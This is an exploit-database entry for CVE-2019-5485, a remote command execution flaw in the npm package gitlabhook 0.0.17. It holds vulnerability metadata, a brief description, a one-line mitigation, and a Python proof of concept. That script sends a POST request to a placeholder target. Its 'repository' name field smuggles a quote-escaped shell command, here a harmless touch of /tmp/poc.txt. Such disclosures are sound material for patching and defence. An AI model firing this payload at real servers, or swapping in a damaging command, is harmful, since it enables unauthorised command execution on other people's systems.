header-logo
Suggest Exploit
vendor:
gitlabhook
by:
Semen Alexandrovich Lyhin
10.0
CVSS
CRITICAL
Remote Command Execution
78
CWE
Product Name: gitlabhook
Affected Version From: 0.0.17
Affected Version To: 0.0.17
Patch Exists: YES
Related CWE: CVE-2019-5485
CPE: a:npmjs:gitlabhook:0.0.17
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux 2, Windows 10
2019

NPMJS gitlabhook 0.0.17 – ‘repository’ Remote Command Execution

A vulnerability in NPMJS gitlabhook version 0.0.17 allows an attacker to execute arbitrary commands on the target system. This is due to the lack of input validation on the 'repository' parameter in the POST request. An attacker can craft a malicious POST request with a malicious 'repository' parameter to execute arbitrary commands on the target system.

Mitigation:

Input validation should be implemented on the 'repository' parameter in the POST request.
Source

Exploit-DB raw data:

# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10. 
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."

Navigation

Suggest Exploit

Services By CQR